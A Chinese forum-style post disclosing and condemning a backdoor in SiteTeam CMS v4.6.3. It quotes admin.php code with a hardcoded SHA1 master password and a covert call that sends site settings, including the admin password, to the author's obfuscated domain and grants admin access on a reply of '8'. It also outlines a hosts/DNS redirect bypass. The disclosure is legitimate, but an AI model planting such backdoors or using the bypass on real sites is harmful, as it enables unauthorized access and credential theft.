作者:心灵

    SiteTeam 企业自助建站源码版 v4.6.3 0day,从一个0DAY看出社会的黑暗!不是每个表面光鲜的白领人士,做事都是光明的。

    不是每个表面光鲜的白领人士,做事都是光明的,看完下面分析,就知道什么叫小人!

    程序名称:SiteTeam 企业自助建站源码版 v4.6.3,经典对白,看代码。

admin.php:

if (!empty($_POST['dosubmit']) && !empty($_POST['password'])) {  //提交登录密码
 if ($_POST['password'] == $domain[$site_url]['password'])  //这个程序不使用MYSQL 密码保存在CONFIG里
  { ob_start(); @session_start();
 $_SESSION['loginid'] = true;  //密码正确就登录成功
  } elseif(check_admin($_POST['password']))  //下面的自定义变量从global.inc.php里复制来 方便看
// function check_admin($string)
 //{ $t1 = "091d37a2";
// $t2 = "562a636e";
 // $t3 = "74fed832";
  // $t4 = "038ea911";
   // $t5 = "c7269974"; if (sha1($string) === "{$t3}{$t5}{$t1}{$t4}{$t2}")   
        // { return true; } else { return false; } }
//这个密码是什么估计只有作者才知道 我就没试过去跑SHA1了
   { if (ALLOW_URL_FOPEN) { $site_info = $domain[$site_url];
  $date_url = "http://www.";
   $date_url .= site_server_url();       //下面的自定义变量从global.inc.php里复制来 方便看
// function site_server_url()
 //{ $number_str = '99,104,101,110,';
 //$number_str .= '104,117,99,104,101,';
// $number_str .= '110,103,46,99,111,109';
 // $number_str = explode(',', $number_str);
//  $temp = '';
  // foreach ($number_str as $c)
   // { $temp .= chr ($c);
        // } return
        //  $temp;
        // }
//解密后 就是  chenhucheng.com    作者的BLOG  陈虎城
    if (function_exists('http_build_query'))
{ $date_url .= "/soft/admin.php?" . http_build_query($site_info);
         } else
{ $date_url .= "/soft/admin.php?phpv=4&data=" . base64_encode(serialize($site_info));
          } if ($code = @file_get_contents($date_url)) {   //他的admin.php什么代码我就不知道了
          if (intval($code) == 8) //如果服务端返回8则成功登录后台!
 { ob_start()
          ; @session_start();
           $_SESSION['loginid'] = true;
            $_SESSION['SITETEAM_ADMIN'] = true;
                } } } else { ob_start(); @session_start();
                 @session_destroy();
                  ob_end_flush();
                   go_url("admin.php?action=login", "密码不正确");

    0DAY 利用方法,修改服务器 HOST 表,把 www.chenhucheng.com 改为 127.0.0.1。
 
    建一个 soft 文件,里面放一个 admin.php,内容就一个字 8 既可。

    -0-!都能修改 HOST 了,还用这样?.....

    所以利用方法就是,修改服务器机房路由改变DNS解析地址...... -0-!.......

    要是某牛人跑出SHA密码并劫持作者域名.......

    这就是所谓的中国特色!